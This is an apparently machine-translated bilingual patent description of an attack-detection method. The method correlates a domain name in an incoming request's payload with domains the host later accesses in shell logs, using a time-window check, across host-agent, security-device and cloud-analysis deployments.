参见图2a，该图为本申请实施例提供的一种示例性应用场景的示意图。在图2a所示的场景中，主机101通过其它网络设备连接至网络，攻击者发送的攻击报文通过其它网络设备(如交换机、路由器等)转发至主机101。主机101上运行有主机代理(agent)，主机agent上运行有网络日志获取模块和主机日志获取模块，主机101利用所述网络日志获取模块获取主机的网络日志，并利用所述主机日志获取模块获取主机的主机日志，并基于所述网络日志和主机日志来确定主机是否被攻击。Refer to Figure 2a, which is a schematic diagram of an exemplary application scenario provided by the embodiment of the present application. In the scenario shown in Figure 2a, the host 101 is connected to the network through other network devices, and the attack packet sent by the attacker is forwarded to the host 101 through other network devices (such as switches, routers, etc.). A host agent (agent) runs on the host 101, and a network log acquisition module and a host log acquisition module run on the host agent. The host 101 uses the network log acquisition module to acquire network logs of the host, and uses the host log acquisition module to acquire Host logs of the host, and determine whether the host is attacked based on the network logs and host logs.

其中：主机agent是运行在主机上的组件，在一个示例中，所述主机agent是主机入侵检测***(host intrusion detection system，HIDS)agent，在又一个示例中，所述主机agent是网络入侵检测***(network intrusion detection system，NIDS)agent。Among them: the host agent is a component running on the host. In one example, the host agent is a host intrusion agent. Detection system (host intrusion detection system, HIDS) agent, in another example, the host agent is a network intrusion detection system (network intrusion detection system, NIDS) agent.

参见图2b，该图为本申请实施例提供的另一种示例性应用场景的示意图，在图2b所示的场景中，主机102通过安全设备103连接至网络，攻击者发送的攻击报文通过安全设备103转发至主机102。可选地，攻击者与安全设备之间还存在一个或多个网络转发设备，如路由器、安全网关等等。主机102和安全设备103还与综合分析设备104进行交互。Refer to Figure 2b, which is a schematic diagram of another exemplary application scenario provided by the embodiment of the present application. In the scenario shown in Figure 2b, the host 102 is connected to the network through the security device 103, and the attack message sent by the attacker passes through Security device 103 forwards to host 102 . Optionally, one or more network forwarding devices, such as routers, security gateways, etc., exist between the attacker and the security device. Host 102 and security device 103 also interact with comprehensive analysis device 104 .

主机102上运行有主机agent，主机agent上运行有主机日志获取模块，主机102利用所述主机日志获取模块获取主机102的主机日志，并将主机日志发送给综合分析设备104。另外，安全设备103包括网络日志获取模块，安全设备103利用所述网络日志获取模块，获得所述主机102的网络日志，并将所述网络日志发送给综合分析设备104。综合分析设备104基于接收到的所述网络日志和主机日志来确定主机是否被攻击。其中：所述主机102、安全设备103以及综合分析设备104位于同一局域网内。对于这种情况，所述主机102和安全设备103中通过所述安全分析设备104的互联网协议(Internet Protocol，IP)地址访问所述综合分析设备104，其中，所述综合分析设备104的IP地址预先配置在所述主机102和安全设备103上。当所述主机102、安全设备103以及综合分析设备104位于同一局域网内时，局域网之外的其它设备不能访问所述综合分析设备104。A host agent runs on the host 102, and a host log acquisition module runs on the host agent. The host 102 uses the host log acquisition module to acquire the host log of the host 102, and sends the host log to the comprehensive analysis device 104. In addition, the security device 103 includes a network log acquisition module. The security device 103 uses the network log acquisition module to obtain the network log of the host 102 and sends the network log to the comprehensive analysis device 104 . The comprehensive analysis device 104 determines whether the host is attacked based on the received network logs and host logs. Wherein: the host 102, security device 103 and comprehensive analysis device 104 are located in the same local area network. For this situation, the host 102 and the security device 103 access the comprehensive analysis device 104 through the Internet Protocol (IP) address of the security analysis device 104, where the IP address of the comprehensive analysis device 104 Pre-configured on the host 102 and security device 103 . When the host 102, security device 103 and comprehensive analysis device 104 are located in the same local area network, other devices outside the local area network cannot access the comprehensive analysis device 104.

本申请不具体限定主机102和综合分析设备104之间进行数据交互所使用的协议。主机102和综合分析设备104之间进行数据交互所使用的协议包括但不限于：TCP和超文本传输协议(hyper text transfer protocol，HTTP)。类似的，安全设备103和综合分析设备104之间进行数据交互所使用的协议包括但不限于：TCP和HTTP。其中，主机102和综合分析设备104之间交互的数据包括前述提及的主机日志，安全设备103和综合分析设备104之间交互的数据包括前述提及的网络日志。This application does not specifically limit the protocol used for data interaction between the host 102 and the comprehensive analysis device 104. The protocols used for data exchange between the host 102 and the comprehensive analysis device 104 include but are not limited to: TCP and hypertext transfer protocol (HTTP). Similarly, the protocols used for data exchange between the security device 103 and the comprehensive analysis device 104 include but are not limited to: TCP and HTTP. The data exchanged between the host 102 and the comprehensive analysis device 104 includes the aforementioned host logs, and the data interacted between the security device 103 and the comprehensive analysis device 104 includes the aforementioned network logs.

此处提及的综合分析设备104，例如是运行了扩展检测和响应(extended detection and response，XDR)软件的设备，又如是运行安全信息事件管理(security information event management，SIEM)软件的设备。The comprehensive analysis device 104 mentioned here is, for example, a device running extended detection and response (extended detection and response, XDR) software, or a device running security information event management (security information event management, SIEM) software.

参见图2c，该图为本申请实施例提供的又一种示例性应用场景的示意图，在图2c所示的场景中，主机102通过安全设备103连接至网络，攻击者发送的攻击报文通过安全设备103转发至主机102。主机102和安全设备103还与云端分析设备105进行交互。Refer to Figure 2c, which is a schematic diagram of another exemplary application scenario provided by the embodiment of the present application. In the scenario shown in Figure 2c, the host 102 is connected to the network through the security device 103, and the attack message sent by the attacker passes through Security device 103 forwards to host 102 . Host 102 and security device 103 also interact with cloud analytics device 105 .

主机102上运行有主机agent，主机agent上运行有主机日志获取模块，主机102利用所述主机日志获取模块获取主机102的主机日志，并将主机日志发送给云端分析设备105。另外，安全设备103包括网络日志获取模块，安全设备103利用所述网络日志获取模块，获得所述主机102的网络日志，并将所述网络日志发送给云端分析设备105。云端分析设备105基于接收到的所述网络日志和主机日志来确定主机是否被攻击。其中：A host agent runs on the host 102, and a host log acquisition module runs on the host agent. The host 102 uses the host log acquisition module to acquire the host log of the host 102, and sends the host log to the cloud analysis device 105. In addition, the security device 103 includes a network log acquisition module. The security device 103 uses the network log acquisition module to obtain the network log of the host 102 and sends the network log to the cloud analysis device 105 . The cloud analysis device 105 determines whether the host is attacked based on the received network logs and host logs. in:

所述主机102和安全设备103位于同一局域网内，而云端分析设备105部署于互联网中。对于这种情况，云端分析设备105提供一个订阅服务，其他任何设备例如主机102和安全设备103通过统一资源定位***(uniform resource locator，URL)、网页(web)应用程序接口(application programming interface，API)、或者域名来访问这个订阅服务。The host 102 and the security device 103 are located in the same local area network, and the cloud analysis device 105 is deployed on the Internet. For this situation, the cloud analysis device 105 provides a subscription service that any other devices such as the host 102 and the security device 103 use through the uniform resource locator (URL) or web application programming interface (API). ), or domain name to access this subscription service.

本申请不具体限定主机102和云端分析设备105之间进行数据交互所使用的协议。主机102和云端分析设备105之间进行数据交互所使用的协议包括但不限于：TCP、HTTP以及基于安全套接层的超文本传输协议(hyper text transfer protocol over secure socket layer，HTTPS)。类似的，安全设备103和云端分析设备105之间进行数据交互所使用的协议包括但不限于：TCP、HTTP以及HTTPS。其中，主机102和云端分析设备105之间交互的数据包括前述提及的主机日志，安全设备103和云端分析设备105之间交互的数据包括前述提及的网络日志。This application does not specifically limit the protocol used for data interaction between the host 102 and the cloud analysis device 105. host The protocols used for data exchange between the machine 102 and the cloud analysis device 105 include but are not limited to: TCP, HTTP, and hypertext transfer protocol over secure socket layer (HTTPS). Similarly, the protocols used for data exchange between the security device 103 and the cloud analysis device 105 include but are not limited to: TCP, HTTP, and HTTPS. The data exchanged between the host 102 and the cloud analysis device 105 includes the aforementioned host logs, and the data interacted between the security device 103 and the cloud analysis device 105 includes the aforementioned network logs.

接下来，结合图3和图4对申请实施例提供的检测攻击的方法进行介绍。Next, the attack detection method provided by the embodiment of the application will be introduced with reference to Figures 3 and 4.

参见图3，图3为本申请实施例提供的一种检测攻击方法的流程示意图。可选地，图3所示的检测攻击的方法，由检测设备执行。Refer to Figure 3, which is a schematic flowchart of an attack detection method provided by an embodiment of the present application. Optionally, the method of detecting attacks shown in Figure 3 is executed by a detection device.

当图3所示的方法应用于以上图2a所示的场景时，所述检测设备是图2a所示的主机101，当图3所示的方法应用于以上图2b所示的场景时，所述检测设备是图2b所示的综合检测设备104，当图3所示的方法应用于以上图2c所示的场景中时，所述检测设备是图2c所示的云端分析设备105。When the method shown in Figure 3 is applied to the scenario shown in Figure 2a above, the detection device is the host 101 shown in Figure 2a. When the method shown in Figure 3 is applied to the scenario shown in Figure 2b above, the detection device is the host 101 shown in Figure 2a. The detection device is the comprehensive detection device 104 shown in Figure 2b. When the method shown in Figure 3 is applied to the scenario shown in Figure 2c above, the detection device is the cloud analysis device 105 shown in Figure 2c.

图3所示的方法，包括步骤S101-S103。The method shown in Figure 3 includes steps S101-S103.

S101：检测设备获取主机的网络日志，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是所述主机接收到的来自其它设备的请求报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名。S101: The detection device obtains the network log of the host. The network log includes parameter information of the first request message. The first request message is a request message received by the host from other devices. The parameters The information includes the first domain name included in the payload part of the first request message.

当图3所示的方法应用于图2a所示的场景中时，所述检测设备集成于主机101中。对于这种情况，S101的具体实现方式为：主机101获取自身的网络日志。在一个示例中，主机101能够通过hook网络函数，获取所述网络日志。在一个示例中，主机利用hook机制监控协议栈函数库中用于处理网络接口收发的报文的网络数据处理函数被调用的情况，在网络数据处理函数被调用时获取网络处理函数所处理的第一请求报文。而后，主机101对所述第一请求报文进行解析，从而得到所述第一请求报文中的载荷，进一步地，再从所述载荷中解析得到第一域名。When the method shown in Figure 3 is applied to the scenario shown in Figure 2a, the detection device is integrated into the host 101. For this situation, the specific implementation method of S101 is: the host 101 obtains its own network log. In one example, the host 101 can obtain the network log by hooking a network function. In one example, the host uses the hook mechanism to monitor when the network data processing function in the protocol stack function library for processing messages sent and received by the network interface is called, and when the network data processing function is called, it obtains the first data processed by the network processing function. A request message. Then, the host 101 parses the first request message to obtain the payload in the first request message, and further parses the payload to obtain the first domain name.

本申请实施例不具体限定主机101解析获得所述载荷、以及主机101从所述载荷中解析得到第一域名的具体实现方式。在一个示例中，当所述第一请求报文为TCP请求报文时，主机101利用请求评论(request for comments，RFC)793中规定的报文格式对所述第一请求报文进行解析，从而得到所述第一请求报文的载荷。主机101得到所述第一请求报文的载荷之后，按照RFC1035中对域名的定义和约束，使用正则表达式解析判断前述载荷中是否存在域名，并在确定前述载荷中存在域名的情况下，提取所述载荷中包括的所述第一域名。The embodiment of this application does not specifically limit the specific implementation manner in which the host 101 parses and obtains the payload, and the host 101 parses and obtains the first domain name from the payload. In one example, when the first request message is a TCP request message, the host 101 parses the first request message using the message format specified in request for comments (RFC) 793, Thus, the payload of the first request message is obtained. After the host 101 obtains the payload of the first request message, it uses regular expression parsing to determine whether the domain name exists in the payload according to the definition and constraints of the domain name in RFC1035, and if it is determined that the domain name exists in the payload, extract the The first domain name included in the payload.

本申请实施例不具体限定前述其它设备，前述其它设备可以是网络设备，也可以是用户设备，其中，用户设备包括但不限于终端设备和服务器。The embodiments of this application do not specifically limit the aforementioned other devices. The aforementioned other devices may be network devices or user equipment, where user equipment includes but is not limited to terminal equipment and servers.

在本申请实施例中，第一请求报文的参数信息，指的是从第一请求报文中提取的内容，或者接收第一请求报文时的上下文信息获得的与第一请求报文相关的参数的信息。第一请求报文的参数信息，除了包括前述第一域名之外，还包括其它信息。在一个示例中，所述参数信息还包括所述主机接收到所述第一请求报文的时刻。在又一个示例中，所述参数信息还包括所述第一请求的载荷部分和/或所述第一请求报文的目的IP地址。 In the embodiment of this application, the parameter information of the first request message refers to the content extracted from the first request message, or the context information obtained when receiving the first request message and related to the first request message. parameter information. In addition to the aforementioned first domain name, the parameter information of the first request message also includes other information. In one example, the parameter information also includes the time when the host receives the first request message. In yet another example, the parameter information further includes the payload part of the first request and/or the destination IP address of the first request message.

当图3所示的方法应用于图2b或者图2c所示的场景中时，S101的具体实现方式为：接收安全设备103发送的所述网络日志，其中，所述安全设备103部署于所述其它设备与所述主机之间，即：所述其它设备将第一请求报文发送给主机102时，需要经过安全设备103转发。此处提及的安全设备103，包括但不限于防火墙等部署有安全防护策略的设备。When the method shown in Figure 3 is applied to the scenario shown in Figure 2b or Figure 2c, the specific implementation of S101 is: receiving the network log sent by the security device 103, wherein the security device 103 is deployed on the Between other devices and the host, that is, when the other device sends the first request message to the host 102, it needs to be forwarded by the security device 103. The security device 103 mentioned here includes but is not limited to firewalls and other devices deployed with security protection policies.

在一个示例中，所述安全设备103获取所述第一请求报文之后，基于所述第一请求报文获得第一请求报文的参数信息，进一步将所述第一请求报文的参数信息发送给所述检测设备。In one example, after obtaining the first request message, the security device 103 obtains the parameter information of the first request message based on the first request message, and further converts the parameter information of the first request message into sent to the detection equipment.

检测设备基于第一请求报文获得第一请求报文的参数信息的具体实现、与主机101基于第一请求报文获得第一请求报文的参数信息的具体实现类似，故而关于检测设备基于第一请求报文获得第一请求报文的参数信息的具体实现，可以参考上文对于主机获取第一请求报文的参数信息的描述部分，此处不再重复描述。The specific implementation of the detection device obtaining the parameter information of the first request message based on the first request message is similar to the specific implementation of the host 101 obtaining the parameter information of the first request message based on the first request message. Therefore, the detection device based on the first request message is similar to the specific implementation of the detection device based on the first request message. For a specific implementation of obtaining the parameter information of the first request message through a request message, please refer to the above description of the host obtaining the parameter information of the first request message, and the description will not be repeated here.

S102：检测设备获取所述主机的主机日志，所述主机日志包括所述主机访问的至少一个域名。S102: The detection device obtains the host log of the host, where the host log includes at least one domain name accessed by the host.

可选地，在一个示例中，所述检测设备获取所述主机在一定时间段内的主机日志，例如，检测设备获取从主机接收到第一请求报文之后的一定时间段内的主机日志。本申请实施例不具体限定所述一定时间段，为提升攻击检测的效率，所述一定时间段对应的时长比较短。例如，检测设备获取从主机接收到第一请求报文之后的10秒内的主机日志。Optionally, in one example, the detection device obtains the host log of the host within a certain period of time. For example, the detection device obtains the host log of the host within a certain period of time after receiving the first request message from the host. The embodiments of this application do not specifically limit the certain time period. In order to improve the efficiency of attack detection, the corresponding duration of the certain time period is relatively short. For example, the detection device obtains the host log within 10 seconds after receiving the first request message from the host.

当图3所示的方法应用于图2a所示的场景中时，所述检测设备集成与所述主机101中。对于这种情况，S102的具体实现方式为：主机101获取自身的主机日志。在一个示例中，主机101通过hook操作***中的shell执行过程，获取自身的主机日志。在一个示例中，主机101利用hook机制监控操作***中的shell执行过程，从而得到自身的shell执行日志。而后，按照RFC1035中对域名的定义和约束，使用正则表达式解析判断每一条shell执行日志中是否存在域名，若存在，则保存该域名，从而得到包括所述主机访问的至少一个域名的主机日志。When the method shown in Figure 3 is applied to the scenario shown in Figure 2a, the detection device is integrated with the host 101. For this situation, the specific implementation method of S102 is: the host 101 obtains its own host log. In one example, host 101 obtains its own host log by hooking the shell execution process in the operating system. In one example, host 101 uses the hook mechanism to monitor the shell execution process in the operating system, thereby obtaining its own shell execution log. Then, according to the definition and constraints of domain names in RFC1035, regular expression analysis is used to determine whether there is a domain name in each shell execution log. If it exists, the domain name is saved, thereby obtaining the host log including at least one domain name accessed by the host. .

在本申请实施例中，所述主机日志，包括与主机以及与主机访问的域名相关的信息。在一个示例中，所述主机日志，除了包括所述至少一个域名之外，还包括至少一个域名中每个域名分别对应的时刻。对于所述至少一个域名中的第二域名而言，所述第二域名对应的时刻，指的是所述主机访问所述第二域名的时刻。在又一个示例中，所述主机日志还包括所述主机的IP地址和/或所述至少一个域名中每个域名分别对应的日志记录。In this embodiment of the present application, the host log includes information related to the host and the domain names accessed by the host. In one example, the host log, in addition to including the at least one domain name, also includes the time corresponding to each domain name in the at least one domain name. For the second domain name in the at least one domain name, the time corresponding to the second domain name refers to the time when the host accesses the second domain name. In yet another example, the host log further includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name.

当图3所示的方法应用于图2b或者图2c所示的场景中时，S102的具体实现方式为：接收主机102发送的所述主机日志。在一个示例中，主机102接收到所述第一请求报文之后，执行获得主机日志的步骤从而获得自身的主机日志，进一步地，将自身的主机日志发送给所述检测设备。When the method shown in Figure 3 is applied to the scenario shown in Figure 2b or Figure 2c, the specific implementation of S102 is: receiving the host log sent by the host 102. In one example, after receiving the first request message, the host 102 performs the step of obtaining the host log to obtain its own host log, and further, sends its own host log to the detection device.

关于所述主机102获得所述主机日志的具体实现，可以参考S101中“主机101获得自身的主机日志”的相关描述部分，此处不做详述。Regarding the specific implementation of the host 102 obtaining the host log, you may refer to the relevant description section of "the host 101 obtains its own host log" in S101, which will not be described in detail here.

另外，本申请实施例不具体限定S101和S102之间的执行顺序，S101可以在S102之前执行，S101也可以在S102和S103之间执行，S101还可以和S102同时执行。In addition, the embodiment of the present application does not specifically limit the execution order between S101 and S102. S101 can be executed before S102, S101 can also be executed between S102 and S103, and S101 can also be executed at the same time as S102.

S103：若所述至少一个域名包括所述第一域名，则所述检测设备产生告警信息，所述告警信息用于指示所述主机被攻击。S103: If the at least one domain name includes the first domain name, the detection device generates alarm information. The alarm information is used to indicate that the host is under attack.

换句话说，告警信息指示第一请求报文所实施的攻击成功。In other words, the alarm information indicates that the attack carried out by the first request message is successful.

检测设备获得网络日志和主机日志之后，将网络日志中的第一域名和主机日志中的至少一个域名进行匹配，若所述主机日志中的至少一个域名包括第一域名，这说明所述主机接收到了包括第一域名的第一请求报文，并且，所述主机访问了所述第一域名。对于这种情况，认为主机基于所述第一请求报文访问了所述第一请求报文中的第一域名。因此，对于这种情况，检测设备确定主机被攻击，因此，检测设备生成用于指示主机被攻击的告警信息。而对于主机日志中的至少一个域名不包括网络日志中的第一域名的情况，说明攻击者虽然试图利用的漏洞发起攻击，但该攻击并未执行成功，在这种情况下不生成告警。After the detection device obtains the network log and the host log, it matches the first domain name in the network log with at least one domain name in the host log. If at least one domain name in the host log includes the first domain name, it means that the host receives The first request message including the first domain name is received, and the host accesses the first domain name. In this case, it is considered that the host accessed the first domain name in the first request message based on the first request message. Therefore, for this situation, the detection device determines that the host is attacked, and therefore, the detection device generates alarm information indicating that the host is attacked. If at least one domain name in the host log does not include the first domain name in the network log, it means that although the attacker tried to exploit the vulnerability to launch an attack, the attack did not succeed. In this case, no alarm is generated.

在一个示例中，检测设备生成告警信息之后，进一步输出告警信息，以便于运维人员或者其它设备(例如管理设备)确定所述主机被攻击，从而采取相应的处理措施。In one example, after the detection device generates the alarm information, it further outputs the alarm information so that operation and maintenance personnel or other devices (such as management devices) can determine that the host is under attack and take corresponding measures.

本申请实施例不具体限定检测设备输出告警信息的具体实现方式，在一个示例中，所述检测设备在显示屏上显示所述告警信息，在又一个示例中，所述检测设备将所述告警信息发送给其它设备例如网管设备。The embodiments of this application do not specifically limit the specific implementation manner in which the detection device outputs the alarm information. In one example, the detection device displays the alarm information on the display screen. In another example, the detection device displays the alarm information. The information is sent to other devices such as network management equipment.

在本申请实施例中，为了使得所述运维人员或者管理设备获知更多与攻击报文的信息，所述告警信息中还包括与所述第一请求报文相关的更多信息。In this embodiment of the present application, in order to enable the operation and maintenance personnel or management equipment to learn more information about the attack message, the alarm information also includes more information related to the first request message.

如前文所述可知，在一个示例中，前述网络日志中包括的第一请求报文的参数信息还包括第一请求报文的载荷部分和/或第一请求报文的目的IP地址，对于这种情况，所述告警信息中也对应包括所述参数信息中所包括的所述载荷部分和/或所述第一请求报文的目的IP地址。例如，所述参数信息包括所述载荷部分，则所述告警信息包括所述载荷部分；又如，所述参数信息包括所述第一请求报文的目的IP地址，则所述告警信息包括所述第一请求报文的目的IP地址。在又一个示例中，所述主机日志还包括所述主机的IP地址和/或所述至少一个域名中每个域名分别对应的日志记录。对于这种情况，所述告警信息还包括所述主机日志中所包括的所述主机的IP地址和/或所述第一域名对应的日志记录。例如，所述主机日志包括所述主机的IP地址，则所述告警信息包括所述主机的IP地址；又如，所述主机日志包括所述至少一个域名中每个域名分别对应的日志记录，则所述告警信息包括所述第一域名对应的日志记录。As mentioned above, in one example, the parameter information of the first request message included in the network log also includes the payload part of the first request message and/or the destination IP address of the first request message. For this In this case, the alarm information also correspondingly includes the payload part included in the parameter information and/or the destination IP address of the first request message. For example, if the parameter information includes the payload part, then the alarm information includes the payload part; and for example, if the parameter information includes the destination IP address of the first request message, then the alarm information includes the payload part. The destination IP address of the first request message. In yet another example, the host log further includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name. For this case, the alarm information also includes the IP address of the host included in the host log and/or the log record corresponding to the first domain name. For example, if the host log includes the IP address of the host, the alarm information includes the IP address of the host; for another example, the host log includes log records corresponding to each domain name in the at least one domain name, The alarm information includes log records corresponding to the first domain name.

如前文对于网络日志和主机日志的描述可知：网络日志中还包括所述主机接收到所述第一请求报文的时刻，所述主机日志还包括所述至少一个域名中每个域名分别对应的时刻。对于这种情况，考虑到对于攻击报文而言，主机接收攻击报文的时刻，早于主机访问攻击报文中包括的域名的时刻。As can be seen from the previous description of the network log and the host log: the network log also includes the moment when the host receives the first request message, and the host log also includes the corresponding information of each domain name in the at least one domain name. time. For this situation, consider that for the attack message, the time when the host receives the attack message is earlier than the time when the host accesses the domain name included in the attack message.

因此，为了进一步提升检测攻击的准确性，在一个示例中，S103在具体实现时，检测设备除了将第一域名与所述至少一个域名进行匹配之外，若所述至少一个域名中包括所述第一域名，所述检测设备进一步判断所述主机接收到所述第一请求报文的时刻，是否早于所述主机访问所述第一域名的时刻，即：所述检测设备进一步判断所述主机日志中包括的所述第一域名对应的时刻是否晚于所述主机接收到所述第一请求报文的时刻。若所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则说明所述主机先接收到所述第一请求报文，再访问所述第一域名，此时，确认主机被攻击，具体地，确定攻击者利用第一请求报文对主机实施了攻击。对于这种情况，检测设备产生前述用于指示主机被攻击的告警信息。Therefore, in order to further improve the accuracy of detecting attacks, in one example, when S103 is implemented, the detection device, in addition to matching the first domain name with the at least one domain name, if the at least one domain name includes the The first domain name, the detection device further determines whether the time when the host receives the first request message is earlier than the time when the host accesses the first domain name, that is: the detection device further determines whether the Whether the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message. If the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, it means that the host receives the first request message first, and then Access the first domain name. At this time, it is confirmed that the host is under attack. Specifically, it is determined that the attacker used the first request message to attack the host. In this case, the detection device generates the aforementioned alarm information indicating that the host is under attack.

在又一个示例中，考虑到对于攻击报文而言，主机接收到该攻击报文的时刻与主机访问该攻击报文中的域名的时刻之间具有一定的时间差，该时间差一般在一定的范围内。鉴于此，在一个示例中，所述检测设备在确定所述至少一个域名中包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻之后，还进一步判断所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值是否小于或者等于预设时间阈值。当所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值时，确定主机被攻击，具体地，确定攻击者利用所述第一请求报文对主机实施了攻击。对于这种情况，检测设备产生前述用于指示主机被攻击的告警信息。In another example, considering that for an attack message, there is a certain time difference between the time when the host receives the attack message and the time when the host accesses the domain name in the attack message. This time difference is generally within a certain range. Inside. In view of this, in one example, the detection device determines that the at least one domain name includes the first domain name and the moment corresponding to the first domain name included in the host log is later than when the host receives the After the time of the first request message, it is further determined whether the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is Less than or equal to the preset time threshold. When the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to the preset time threshold, it is determined that the host is attacked, Specifically, it is determined that the attacker used the first request message to attack the host. In this case, the detection device generates the aforementioned alarm information indicating that the host is under attack.

本申请实施例不具体限定所述预设时间阈值，在一个示例中，考虑到主机接收到攻击报文的时刻与主机访问该攻击报文中的域名的时刻之间的时间差一般比较小，因此，所述预设时间阈值是一个比较小的值，例如，所述预设时间阈值为10秒。另外，将该预设时间阈值设置的比较小，也能够提升检测攻击报文的效率，相应的，及时检测到攻击报文，也能够及时采取一定的处理措施。举例说明：预设时间阈值若设置的较长，例如设置为5小时，则主机接收到第一请求报文之后，需要将第一域名将主机在5小时内访问的域名进行比较，换言之，在一些情况下，需要等待5小时才能确定主机是否被攻击。The embodiment of the present application does not specifically limit the preset time threshold. In one example, considering that the time difference between the time when the host receives the attack message and the time when the host accesses the domain name in the attack message is generally relatively small, therefore , the preset time threshold is a relatively small value, for example, the preset time threshold is 10 seconds. In addition, setting the preset time threshold to a relatively small value can also improve the efficiency of detecting attack packets. Correspondingly, if attack packets are detected in a timely manner, certain processing measures can be taken in a timely manner. For example: If the preset time threshold is set to a longer value, for example, 5 hours, then after the host receives the first request message, it needs to compare the first domain name with the domain names accessed by the host within 5 hours. In other words, after In some cases, it takes up to 5 hours to determine whether the host has been attacked.

通过以上描述可知，利用本申请实施例提供的检测攻击的方法，结合第一请求报文中包括的第一域名以及主机访问的至少一个域名来确定主机是否被攻击。在攻击者采用使用漏洞对主机进行入侵，并且该漏洞允许攻击者直接在主机上执行***命令的攻击场景下，本方案的检测机制与攻击者的攻击模式相吻合，因此，本方案能够准确地对针对主机的攻击进行检测。As can be seen from the above description, the attack detection method provided by the embodiment of the present application is used to determine whether the host is attacked by combining the first domain name included in the first request message and at least one domain name accessed by the host. In an attack scenario where an attacker uses a vulnerability to invade the host and the vulnerability allows the attacker to directly execute system commands on the host, the detection mechanism of this solution is consistent with the attacker's attack mode. Therefore, this solution can accurately Detect attacks against hosts.

而且，利用本申请实施例的方案，结合网络日志和主机日志来识别攻击报文，即：本方案所识别的攻击报文，为攻击成功的攻击报文，因此，利用本方案，不会对没有攻击成功的攻击报文触发告警，从而降低误告警。Moreover, the solution of the embodiment of this application is used to identify attack messages in combination with network logs and host logs. That is, the attack messages identified by this solution are successful attack messages. Therefore, using this solution will not Attack packets without successful attacks trigger alarms, thereby reducing false alarms.

参见图4，图4为本申请实施例提供的一种检测攻击方法的信令交互图。图4所示的检测攻击的方法，应用于检测攻击的***，所述检测攻击的***，包括主机、安全设备和检测设备。在一个示例中，所述检测攻击的***部署于图2b对应的网络场景中，即：所述检测攻击的***包括：主机102、安全设备103和综合分析设备104。在又一个示例中，所述检测攻击的***部署于图2c对应的网络场景中，即：所述检测攻击的***包括：主机102、安全设备103和云端分析设备105。Refer to Figure 4, which is a signaling interaction diagram of an attack detection method provided by an embodiment of the present application. The method for detecting attacks shown in Figure 4 is applied to a system for detecting attacks. The system for detecting attacks includes a host, a security device, and a detection device. In one example, the system for detecting attacks is deployed in the network scenario corresponding to Figure 2b, that is, the system for detecting attacks includes: a host 102, a security device 103, and a comprehensive analysis device 104. In another example, the system for detecting attacks is deployed in the network scenario corresponding to Figure 2c, that is, the system for detecting attacks includes: a host 102, a security device 103, and a cloud analysis device 105.

图4所示的检测攻击的方法，包括步骤S201-S204。The method of detecting attacks shown in Figure 4 includes steps S201-S204.

S201：安全设备将主机的网络日志发送给检测设备，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是主机接收到的来自其它设备的报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名。S201: The security device sends the network log of the host to the detection device. The network log includes parameter information of the first request message. The first request message is a message received by the host from other devices. The parameter information includes the first domain name included in the payload part of the first request message.

S202：主机将所述主机的主机日志发送给所述检测设备，所述主机日志包括所述主机访问的至少一个域名。 S202: The host sends the host log of the host to the detection device, where the host log includes at least one domain name accessed by the host.

S203：检测设备接收所述安全设备发送的所述网络日志、以及接收所述主机发送的所述主机日志。S203: The detection device receives the network log sent by the security device and the host log sent by the host.

S204：检测设备在所述至少一个域名包括所述第一域名的情况下，产生告警信息，所述告警信息用于指示所述主机被攻击。S204: When the at least one domain name includes the first domain name, the detection device generates alarm information, and the alarm information is used to indicate that the host is attacked.

关于S201-S204的具体实现，可以参考上文对于S101-S103中的相关描述部分，此处不再重复描述。Regarding the specific implementation of S201-S204, you may refer to the relevant description of S101-S103 above, and the description will not be repeated here.

基于以上实施例提供的检测攻击的方法，本申请实施例还提供了对应的装置。Based on the attack detection method provided in the above embodiments, embodiments of the present application also provide corresponding devices.

参见图5，该图为本申请实施例提供的一种检测装置的结构示意图。该检测装置用于执行以上方法实施例提供的检测攻击的方法。Refer to Figure 5, which is a schematic structural diagram of a detection device provided by an embodiment of the present application. The detection device is used to execute the attack detection method provided by the above method embodiment.

图5所示的检测装置500，包括获取模块501和处理模块502。The detection device 500 shown in Figure 5 includes an acquisition module 501 and a processing module 502.

在一个示例中，图5所示的检测装置500，应用于检测设备，对于这种情况：In one example, the detection device 500 shown in Figure 5 is applied to detection equipment. For this situation:

所述获取模块501，用于获取主机的网络日志，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是所述主机接收到的来自其它设备的请求报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；所述获取模块501，还用于获取所述主机的主机日志，所述主机日志包括所述主机访问的至少一个域名；所述处理模块502，用于若所述至少一个域名包括所述第一域名，则产生告警信息，所述告警用于指示所述主机被攻击。The acquisition module 501 is used to obtain the network log of the host. The network log includes parameter information of a first request message. The first request message is a request message received by the host from other devices. , the parameter information includes the first domain name included in the payload part of the first request message; the acquisition module 501 is also used to obtain the host log of the host, the host log includes the host accessed by the host At least one domain name; the processing module 502 is configured to generate alarm information if the at least one domain name includes the first domain name, and the alarm is used to indicate that the host is attacked.

在一种可能的实现方式中，所述若所述至少一个域名包括所述第一域名，则所述处理模块502，用于：若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则产生所述告警信息。In a possible implementation, if the at least one domain name includes the first domain name, the processing module 502 is configured to: if the at least one domain name includes the first domain name, and the If the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, the alarm information is generated.

